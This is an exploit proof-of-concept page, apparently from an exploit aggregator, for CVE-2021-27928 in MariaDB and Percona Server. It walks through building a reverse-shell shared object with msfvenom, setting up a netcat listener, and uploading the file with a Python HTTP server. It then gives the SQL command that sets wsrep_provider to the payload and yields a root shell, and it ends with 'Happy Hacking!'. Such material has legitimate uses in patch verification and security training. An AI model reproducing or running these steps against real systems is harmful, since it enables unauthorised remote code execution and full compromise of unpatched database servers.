Share
## https://sploitus.com/exploit?id=6197722F-1A68-5649-98B9-835D23DEB2FA
# CVE-2021-27928 POC

## Description

A remote code execution issue was discovered in MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. NOTE: this does not affect an Oracle product.

## POC
Let's create our payload with Msfvenom. For our payload we will use **/linux/x64/shell_reverse_tcp** with our IP for **LHOST** and PORT number for **LPORT**. We are also gonna specify the file type with **-f** which in our case is **elf-so**. And we will save the output file as **CVE-2021.27928.so** with **-o** option. 
<code>msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so</code>

![](5.png)

Our payload is ready! let's set up **netcat** a listener on our specified port.

Let's move our file to the target machine. For this we can use any way we prefer. I will use python http server.
![](2.png)

Lets save the file to **/tmp** directory
![](4.png)


Now we need to log into the database and set wsrep_provider to our uploaded payload. 

<code>SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";</code>

![](3.png)

Time to check our listener. If we were successful we sould have obtained root shell on the machine!

![](1.png)

Happy Hacking!
  
## References

https://www.exploit-db.com/exploits/49765

https://nvd.nist.gov/vuln/detail/CVE-2021-27928